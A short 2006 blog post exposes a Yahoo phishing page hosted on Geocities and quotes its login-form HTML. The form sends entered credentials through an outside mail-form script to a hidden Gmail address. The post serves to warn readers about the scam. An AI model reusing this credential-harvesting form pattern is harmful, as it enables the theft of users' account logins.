Tuesday, September 05, 2006

Yet another Yahoo Social engineering

See this link http://www.geocities.com/making_you_laugh.com19/ ? see a picture for details, found something interesting? (thx to someone that paste it on my messenger this "early" morning ... ;) )

So, if u got this link what would u do ?, see the site URL "making_you_laugh---", does it make you curious?, you want to see it would you ? (i bet most of u will enter your id). Well y3dips, then what is the problems? .. here are somethin "funny" section:

  • in that time, i was already sign in at yahoo (my yahoo account); so, if this a legal yahoo stuff (see that page), then why do i need to log in again?

  • second, i know geocities.com would not allow such a server-side programming (php, asp, cgi, so how come the input got processed? , javascript?? ;i use this free yahoo hosting support for 6 years :P)

  • Interesting part was when I see the code; and i found this
    [legend]Login Form[/legend]
    [FORM METHOD="POST" ACTION="http://www2.fiberbit.net/form/mailto.cgi" ENCTYPE="x-www-form-urlencoded"]
    [INPUT TYPE="hidden" NAME="Mail_From" VALUE="Yahoo"]
    [INPUT TYPE="hidden" NAME="Mail_To" VALUE="tieurshoes@gmail.com"]
    [INPUT TYPE="hidden" NAME="Mail_Subject" VALUE="Yahoo id"]
    [INPUT TYPE="hidden" NAME="Next_Page" value="http://photos.yahoo.com/ph//my_photos"]
    [table id="yreglgtb" summary="form: login information"]

  • You got that friends ?, actually i made a stuff like this in early 2002 :). :lol:

    No comments:

    Post a Comment